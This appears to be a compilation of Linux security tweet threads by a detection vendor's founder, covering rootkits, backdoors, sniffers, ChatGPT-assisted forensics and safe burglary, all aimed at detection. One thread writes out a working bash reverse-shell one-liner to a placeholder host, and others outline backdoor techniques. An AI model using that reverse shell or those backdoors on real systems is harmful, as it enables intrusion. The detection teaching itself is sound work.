Craig Rowland - Agentless Linux Security
Agentless Linux security. No endpoint agents and no drama. Linux malware, forensics, intrusion detection, and hacking. Founder @SandflySecurity.
Aug 14 19 tweets 8 min read
@Phrack had a great article on leaked North Korean APT operations, including a Linux stealth rootkit with backdoor. I took a look at this backdoor and wanted to share detection tips. Full article at the end of this thread.

First, this rootkit is based on the khook library. This is a common rootkit base that allows full stealth for processes, network connections, files, etc. This is what @SandflySecurity sees when the rootkit is active. It's only stealthy if you aren't looking!
Aug 9 11 tweets 4 min read
Since I apparently have so many safe fans, let's talk about my favorite safe type: Mosler Round Doors. They are absolute tanks with interesting features.

Mosler made excellent vaults and safes of superior security and design. The round doors are my favorite as they are the absolute strongest design. The door rotates and locks into lugs when you turn the T handle. The bolts just keep the door from spinning unlocked.
Aug 9 10 tweets 5 min read
I recommend placing a 24/7 monitored smoke alarm above your safe. Cutting tools make a lot of smoke, and this would set off the alarm and get help dispatched while scaring off attackers. Here is a thread of burglarized safe photos I've seen or that were taken by others, with advice.

ISM Jeweler's safe on display floor of safe company. Attacked with oxyfuel torch. This is Hollywood-tier nonsense and would never work on this type of safe.
Jun 23 12 tweets 4 min read
The SCTP protocol on Linux provides a reliable and stealthy way to access Linux. In this thread I'm going to demonstrate a simple SCTP backdoor and how it can be missed by security teams. Then I'll show you how to look for this kind of activity.

SCTP is a protocol mainly used for telcos. It provides reliable transport like TCP, but is not TCP. Be aware that network monitoring may not be paying close attention to SCTP and packet filters can be mis-configured to not block it.
Jun 15 9 tweets 3 min read
The /proc/net/packet file on Linux shows you all open raw sockets that are grabbing network traffic. I'm going to show you what is in this file and provide a script that lists all processes sniffing traffic to help find malicious sniffers.

The /proc/net directory contains files that show protocol use on Linux. The /proc/net/packet file shows you all open raw/packet sockets, which means the process is sniffing traffic. The file shows you open inodes and who owns them, but doesn't list the process doing the deed.
Mar 27 12 tweets 5 min read
This new Linux script from THC will encrypt and obfuscate any executable or script to hide from on-disk detection. I'm going to show you how to detect it with command line tools in this thread.

github.com/hackerschoice/…

First, it only encrypts the binary at rest on disk. It is not encrypting the running process. This will evade legacy file scanning with YARA, etc., which is unreliable on Linux and which I don't recommend using. The running process has no encryption, so that is our detection target.
Jul 29, 2024 10 tweets 2 min read
It is a total myth that you need agents on Linux to find attackers. It can all be done in user space and there is no reason to risk system stability doing kernel telemetry science projects across your org. Thread... First, people think attackers always deploy stealth rootkits on Linux, but this is absolutely not the case. Most attacks are plainly obvious, but many are not found because nobody is looking. Kernel monitoring offers no advantage in finding typical attack patterns.
Jun 25, 2024 8 tweets 3 min read
Detecting stealth rootkits on Linux can be done from the command line. The secret is to ask the same question multiple ways to make sure all answers agree.

Let's find a directory from the Reptile stealth rootkit on Linux with link checks.

h/t @hal_pomeranz for this method.

When you run a rootkit like Reptile, they often come with the ability to hide a directory if named a certain way. Any directory with the name "reptile" in it will be hidden with this rootkit, as you see below under /lib/udev.
Jun 17, 2024 10 tweets 4 min read
One of my favorite reverse shells for Linux is this:

bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1

It's simple and works on just about every Linux system without elaborate payloads. Let's discuss how to investigate it.

When you look at the process listing, you'll see a shell running. But the shell will have the interactive (-i) flag. In general, this isn't terribly common and is a good place to put your attention.
Mar 1, 2024 8 tweets 3 min read
Report below on Ubiquiti compromise tactics and indicators. Includes OpenSSH backdoor/credential harvesting and dropped SSH key. Plus custom python based backdoors, iptables proxying and tampered binaries. Some thoughts.

ic3.gov/Media/News/202…
Using SSH with passwords means a trojanized binary will steal any credential of someone logging in. If you are not using public keys with SSH on Ubiquiti and other devices (which prevents this), at least use a unique password with *each* device. Do not re-use passwords.
Feb 28, 2024 6 tweets 4 min read
Thanks to one of my anonymous spies, I have run this Linux backdoor and @SandflySecurity easily found it. As discussed:

Process masquerading (renames itself [syslogd])
Opens raw UDP socket for comms
Impersonates kernel thread
Waits for instructions

More details in thread...

As disclosed, it runs as [syslogd] after exec. With a ps -auxwf command it is easily seen sitting out all alone and not part of the main [kthreadd] process, PID 2.

ps -auxwf is your friend.
Oct 17, 2023 10 tweets 4 min read
The translated Ukrainian report contains more details on these attacks. Let's go over them in this thread. @SandflySecurity can find many of these tactics out of the box right now.
Backdoor PAM authentication and grab passwords used to log in. The stolen passwords are dropped in this file with simple XOR encryption:

/lib/libc.so.7

I don't like seeing weird files under /lib directories. Here we flag a standard ELF trying to hide as a shared object variant.
Mar 19, 2023 7 tweets 4 min read
This is a great write-up from @Mandiant about a Fortinet attack and evasive backdoor. The backdoor uses port knocking and iptables forwarding reminiscent of the BPFDoor malware we wrote about last year.

mandiant.com/resources/blog…

FYI, agentless @SandflySecurity can run on many embedded and IoT devices instantly where other EDRs can't. We do this today and you can use our free license to check your systems.

"Sandfly is where agents can't be."

sandflysecurity.com/get-sandfly/
Mar 19, 2023 5 tweets 3 min read
I asked ChatGPT to analyze a suspicious Linux process masquerading as the "date" command. However, I had it do so in the style of WOPR from WarGames. It provided an excellent analysis based on the raw data from @SandflySecurity along with some guidance. Thread...

The "date" command was flagged on a Linux host. I removed the explanation of why it was detected so we could see what ChatGPT could make of it as a forensic analyst without any help. The initial observations are an excellent starting point for a Linux investigation:
Mar 17, 2023 5 tweets 3 min read
Let's have ChatGPT give an opinion on a masquerading Linux process that was detected hiding on a system. I'll feed it the JSON with no hints other than the data @SandflySecurity provided.

ChatGPT summarizes the data, and even pulls out that the process deleted flag is set to true, so it's masquerading and also deleted itself to hide.
Mar 17, 2023 7 tweets 3 min read
ChatGPT helping investigate a suspicious Linux kernel module suspected of being a rootkit. I ask it to parse the JSON and it identifies the key fields.

I ask it whether this kernel module called "Diamorphine" that was found is suspicious. The answer is concise and correct. It's cribbing our explanation a little, but still augmented with other data, so we'll let it go.
Mar 17, 2023 6 tweets 2 min read
I have been using #ChatGPT to help with Linux forensic investigations. It is an incredibly useful tool when guided with a little knowledge. In this thread I'm going to demonstrate how to investigate a suspicious process with SCTP sockets operating, using @SandflySecurity.

First we'll paste in the raw event JSON and ask it to interpret it. ChatGPT does a great job understanding the fields without any prompting. It knows a security tool generated it and identifies key fields rapidly.
Mar 17, 2023 14 tweets 6 min read
I have been using #ChatGPT to help with Linux forensic investigations. It is an incredibly useful tool when guided with a little knowledge. In this thread I'm going to demonstrate how to investigate a suspicious process with SCTP sockets operating, using @SandflySecurity.

First we'll paste in the raw event JSON and ask it to interpret it. ChatGPT does a great job understanding the fields without any prompting. It knows a security tool generated it and identifies key fields rapidly.
May 9, 2022 5 tweets 3 min read
Sandfly users (even free users) can enable the following incident response checks to flag processes running as sniffers. It will easily find #BPFdoor. Here's how in this thread:

We have checks for sniffer activity in the incident response modules. They are not run by default as they can be noisy at times, but we do have a tuned version that is not noisy. Select the hosts you want scanned, then in sandfly selection use the filter to find "sniffer".
May 8, 2022 13 tweets 6 min read
I looked at the sources for #BPFdoor and ran @SandflySecurity against the binary. We could find this since at least 1.x of our product. Here is a rundown of what it is doing.

#BPFdoor uses eBPF to sniff traffic. It can bypass firewall rules to see packets. When it starts it writes to /var/run/haldrund.pid, which is obfuscated as hex in the code. It also masquerades its name using a number of pre-defined command line values below:
Aug 2, 2021 9 tweets 2 min read
People are asking me to post hashes about this Linux malware we came across. No. Using hashes for finding Linux malware doesn't work, and hashes are easily altered. Look for tactics instead. Here are some tactics to use in this thread.

Can you see the /etc/ld.so.preload file? Can you read it with /bin/cat or see it with the /bin/ls command? If you are being stopped from doing this, then you have ld preload malware stopping you.